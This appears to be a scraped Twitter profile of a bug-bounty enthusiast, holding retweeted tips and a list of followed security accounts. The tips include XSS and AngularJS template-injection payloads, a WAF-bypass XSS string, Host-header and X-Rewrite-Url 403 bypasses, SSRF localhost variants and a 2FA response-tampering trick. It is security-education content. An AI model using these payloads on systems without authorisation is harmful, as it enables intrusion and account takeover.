TRIcKymAn_Vß @_tricky_man_vs
nothing toooo say......🤗 Joined September 2020-
Tweets80
-
Followers12
-
Following76
-
Likes209
Request GET /admin Host: test.com Response 403 Forbidden You can bypass 403 just by changing host domain to 127.0.0.1 Request GET /admin Host: 127.0.0.1 Response 200 OK #bugbounty #bugbountytip
Hakrawler Version 2 is out:- Much simpler Much faster Much more reliable Less bugs (hopefully none) Simple output for easier tool chaining Less features No banner No colours github.com/hakluke/hakraw…
*Simple list of bugs for testing* #bugbounty #bugbountytips #websecurity [+] Cache Poisoning [+] Cash Overflow [+] Clickjacking [+] Command injection attacks [+] Comment Injection Attack [+] Content Security Policy [+] Content Spoofing [+] Credential stuffing
A really comprehensive API security testing mind-map! Great work @dsopas <3 dsopas.github.io/MindAPI/play/
Without ">" (XSS) <svg onload='alert(1)' <svg onload="alert(1)" <svg onload=alert(1)// <svg onload=alert(1)+ <svg onload=alert(1)<!-- <opening_tag>PAYLOAD</closing_tag>
X-Rewrite-Url Header is Can be used to bypass WordPress 403 pages. POST /xmlrpc HTTP/1.1 Host: target.com X-Rewrite-Url: xmlrpc.php X-Rewrite-Url: wp-json/v2/users X-Rewrite-Url: wp-login.php Happy Hacking ! #bugbounty #bugbountytip #bugbountytips
Found ssrf? Try these for more impact: 1. To access localhost~ http://127.0.0.1:port http://localhost:port https://127.0.0.1:port https://localhost:port http://[::]:port http://0000::1:port http://[0:0:0:0:0:ffff:127.0.0.1] http://0/ http://127.1 http://127.0.1
In case if you missed my talk at @AhmOwasp. Here's the link to Slides, MindMap & Git Repo Slides: speakerdeck.com/harshbothra/go… MindMap: xmind.net/m/2FwJ7D GitHub Repo: github.com/harsh-bothra/l… #bugbountytips #appsec #infosec
an AngularJS Client-Side Template Injection as XSS payload for 1.2.24-1.2.29, thanks to @garethheyes {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}} #bugbounty #bugbountytips #cybersecurity
Selected a program; 1st attempt = 3.5k$ After few months 2nd attempt = 7.5k$ After few months (Bypassed the fixes + New feature bugs) 3rd attempt = 10k$ Come back with 🔥
Testing for 2FA bypass ? Your response code : 302,400,403 etc Tamper it with 200 OK Add following context response {“success”:”true”} Or verified #kongsec
A solid XSS payload that bypasses Imperva WAF 😄 <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click #infosec #bugbountytips
Secret keys finder github.com/momenbasel/key…
Subdomain takeover and DNS zone transfer with simple oneliner tools. Full writeup: cysek.org/post/subdomain… Thanks for inspiring guys, One day I wanna be like you. @ofjaaah @ADITYASHENDE17 @NahamSec #bugbountytips #bugbounty #Pentesting
Selected a program; 1st weak = 0 bugs 2nd weak = 2+ bugs 3rd weak = 50+ bugs 4th weak = 100% traiged Rewarded for 50+ bugs Dig deep until you find 💎
Morning with this notification made my day😍😍 Thanks @ADITYASHENDE17 Bhai for follow back! You are true Inspiration🥳🔥
There's a lot of decisions made around bug bounty scopes, and how they're defined. Let's discuss! 👉youtu.be/OsIXSuVO8ig
All About Bug Bounty:- All about bug websites (bypasses, payloads, and etc) github.com/daffainfo/AllA…
BugBountyTips Retweet... @BBT_retweet
891 Followers 2K Following
47z1Lū7h @4tz1luth
1K Followers 4K Following Into Pentesting! :D | ☆▪︎☆▪︎☆▪︎☆▪︎☆▪︎☆▪︎☆▪︎☆▪︎☆ | #infosec | CTF lover!!! 😍
NetR@ng3 @NetRng31
30 Followers 242 Following insane explorer of the cyber world If debugging is the process of removing bugs from software, programming must be the process of getting them into it.
Abdul Karim @akarimsays
69 Followers 296 Following Crypto Trader 📈 | Content Creator 🎥 | Ethical Hacker | $DOGE 🐕 🍰 $CAKE 🥞 https://t.co/N9UL91Fe90…
SkyNet Tools @SkyNetTools
7K Followers 5K Following Providing the Latest #Infosec #News, #Tools, and #Exploits #BugBounty
Keshav Malik @g0t_rOoT_
597 Followers 482 Following Security at @LinkedIn | Security Automation | Content Writer
Mayur Parmar @th3cyb3rc0p
5K Followers 5K Following Team Lead - NST | 👔 I Don't stalk,I Investigate 📌 | SRT @SynackRedTeam | Penetration Tester @yogoshaofficial |🇮🇳
Bounty Security @BountySecurity
19K Followers 10K Following Offensive Web Application Security Software
Haxel0rd @haxel0rd
1K Followers 1K Following Senior #Pentester at work, GreyHat #Hacker in my free time. This is my private space. Strictly separating wurk from private hacking adventures. For teh lulz : 3
Netflix India South @Netflix_INSouth
227K Followers 137 Following Admin is busy trying to arrange a horse for the wedding 🫡
GoSecure @GoSecure_Inc
3K Followers 131 Following GoSecure is a leading provider of Managed Extended Detection and Response and expert Professional Security services.
Nuclei by ProjectDisc... @pdnuclei
37K Followers 183 Following Nuclei uses a vast templating library to scan applications, cloud infrastructure, and networks to find and remediate vulnerabilities.
ᴠɪɴᴏᴛʜ ᴋ�... @vinnyvinoth242
2K Followers 1K Following Bug Bounty Hunter 👨💻 | Penetration Tester 🖥️ | Super DaD 👨👩👦 | Learning Forever 💯
TryHackMe @RealTryHackMe
284K Followers 103 Following An online platform that makes it easy to break into and upskill in cyber security, all through your browser.
ghostlulz @ghostlulz1337
14K Followers 1K Following Founder /CEO @StealthNetAI , Author - Bug Bounty Playbook. @DakotaState Alum , Founder/Former CTO RedSentry , Ex @bishopfox. #bugbounty #infosec #redteam
ProjectDiscovery @pdiscoveryio
38K Followers 132 Following Detect real, exploitable vulnerabilities. Harness the power of Nuclei for fast and accurate findings without false positives.
payloadartist @payloadartist
43K Followers 284 Following Yapping about AI, AppSec, Hacking, & Cybersecurity • Helped secure organizations like Google • Opinions are my cat's • Part-time shitposter
spaceraccoon | Eugene... @spaceraccoonsec
25K Followers 301 Following Here to learn! Infosec@Open Government Products | White Hat && SecOps
Th3g3nt3lman @Th3G3nt3lman
25K Followers 738 Following Risin' up out of the flames like a phoenix, Strainin' to carry the weight of my brain like a genius..
Intigriti @intigriti
195K Followers 657 Following Bug bounty & VDP platform trusted by the world’s largest organisations! 🌍
Fisher @Regala_
10K Followers 505 Following Half hacker, half daydreamer. Mercenary for hire. Casabranca. Snarky tweets only. Opinions my own
Sam Curry @samwcyo
98K Followers 1K Following
Ron Chan @ngalongc
19K Followers 501 Following
Natarajan @Natarajan_91
694K Followers 169 Following Official account of T Natarajan | Professional Cricketer | @BCCI | @SunRisers | @TNCACricket | @TNPremierLeague |
m0z @LooseSecurity
7K Followers 192 Following The greatest trick the devil ever pulled, was convincing the world that cyber security existed.
The Bug Bounty Hunter @tbbhunter
47K Followers 0 Following Promotions or business ✉️[email protected]
disclose.io (infosec.... @disclose_io
3K Followers 902 Following Free open-source tools to standardize, normalize, promote, and protect good-faith security research.
Keshav Malik @g0t_rOoT_
597 Followers 482 Following Security at @LinkedIn | Security Automation | Content Writer
Kartikeya Sharma @pykartik
27 Followers 133 Following Bug Bounty Hunter There's always a way in !!!!!!
Avanish Pathak @avanish46
7K Followers 508 Following Red Team Security Consultant | Lead Pentester @Cobalt_io |
WHOAMI33 @WHOAMI332
7 Followers 11 Following #Help poor peoples #learning bug bounty.. Instagram:mr.whoami33
Harsh Bothra @harshbothra_
43K Followers 740 Following Freelance Pentester & Consultant • Cobalt Core Lead & Pentester • Author • Speaker • Blogger • SecurityExplained • Project Bheem • Learn365 • Views are personal
PortSwigger @PortSwigger
101K Followers 23 Following We are a leading provider of software and learning on web security. We make @Burp_Suite and @WebSecAcademy.
James Kettle @albinowax
79K Followers 94 Following Director of Research at @PortSwigger aka @Burp_Suite. Find my research, tools & contact details at https://t.co/vP6UbGmvl3
ramsexy @plmaltais
8K Followers 755 Following French-Canadian hacker 🇨🇦 Full-time bug bounty hunter 🐛💥 Strava Local Legend 🏃♂️💨 Surfing the web and hacking the waves 🌊🏄
Vegeta @_justYnot
7K Followers 716 Following Curious. Hungry for knowledge. Just why not? Acknowledged by @Apple security | eWPTXv2 |eCPPTv2 | eJPT | @Synackredteam member | Bug Bounty Hunter
siLLyDaddy @sillydadddy
6K Followers 249 Following Son | Daddy 🐷 | Hacker | Offensive Security Senior Consultant | Ex Senior Software Developer | OSCP | eWPTX | CRTP | OCJP Views are my own !
Luke Stephens (hakluk... @hakluke
96K Followers 2K Following Hacker, marketer. I manage socials and produce amazing technical blogs for cybersecurity orgs. Founder of @hacker_content and @haksecio
👑 OFJAAAH 👑 @ofjaaah
19K Followers 510 Following Bug Hunter ☣ | Hi I Hacker spare time and not spare time too 🧙♂️. https://t.co/ob6h7VO9uC
Musab Khan @Musab1995
4K Followers 750 Following Certified Ethical Hacker | Penetration Tester | Youtuber
zseano @zseano
79K Followers 703 Following
Aseem Shrey @AseemShrey
8K Followers 3K Following Founder https://t.co/gzIQqhCPZb - We handle security. You ship awesome products 🚀 🛠️ Founder SecureMyOrg 📹 https://t.co/ZjN2YzePJW #cybersec #privacy
Pratik Dabhi @impratikdabhi
19K Followers 998 Following 👨🏻💻Ethical Hacker 🐞Bug Hunter | Penetration tester 👨🏻💻Security Consultant at @Deloitte ☢️ Bugcrowd Top 300 | YouTuber (23k+ Subs) | Yeswehack Top 100
Vickie Li @vickieli7
32K Followers 194 Following Infosec nerd. Hacks and secures. Creates god awful infographics. Author of #BugBountyBootcamp. Security @instacart.
Akita ZeN 🇦🇷 @akita_zen
26K Followers 1K Following Alchemist ✨🧙♂️ Energy Master ✨ Spiritual hacker 🌟 bugbounty hunter ✨ ptsd survivor ✨ Man of Faith 🌟
Bug Bounty Reports Ex... @gregxsunday
53K Followers 616 Following Grzegorz Niedziela - a hacker who documents his hacking journey by creating and curating the best content about bug bounty and offensive security.
John Hammond @_JohnHammond
300K Followers 3K Following Cybersecurity Researcher @HuntressLabs || Just Hacking Training @JustHackingHQ w/ @ethicalhacker || https://t.co/UtsNJiyQtS || https://t.co/narO3sz7y6
TCM Security @TCMSecurity
208K Followers 358 Following Come learn to hack at TCM Security Academy! Veteran owned. Quality results.
BugBountyHQ @BugBountyHQ
24K Followers 95 Following
Trends for United States
You might like
